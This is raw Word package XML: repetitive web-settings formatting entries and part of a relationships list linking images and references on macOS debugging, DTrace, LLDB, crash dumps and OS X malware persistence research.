      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1468694135">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1503736902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548838585">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1590040047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1602448704">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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04337210">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1618830710">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1619533527">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1626228470">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1632051041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1646399169">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1654872857">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1709525707">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1711415701">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1732461882">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1741176130">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55665687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1761639985">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1788432348">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1789004480">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1789817711">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1805125371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1817868555">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1832596716">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1845166419">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1873033456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1880236223">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1885943740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1895041775">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1907688119">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1914899165">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1925189305">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1932662289">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1962609030">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1981424372">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1982226540">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1998265155">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2010257220">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2016808590">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2030376500">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2030518737">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2044135410">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2047559975">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2048599451">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2053310504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2066030176">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2084059570">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2084327227">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2107266964">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108035915">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2114547378">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2132433711">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2138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c.chromium.org/viewvc/chrome/trunk/src/base/mac/os_crash_dumps.cc?revision=178706" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.gif"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/s3.synack.com/Synack_Shakacon_OSX_Malware_Persistence.pdf" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.brendangregg.com/dtrace.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://people.freebsd.org/~obrien/amd64-elf-abi.pdf" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://drops.wooyun.org/tips/6919" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://developer.apple.com/qa/qa2001/qa1264.html" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lldb.llvm.org/python-reference.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Superuser" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Debugger" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pi-chan/ios-sandbox" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" 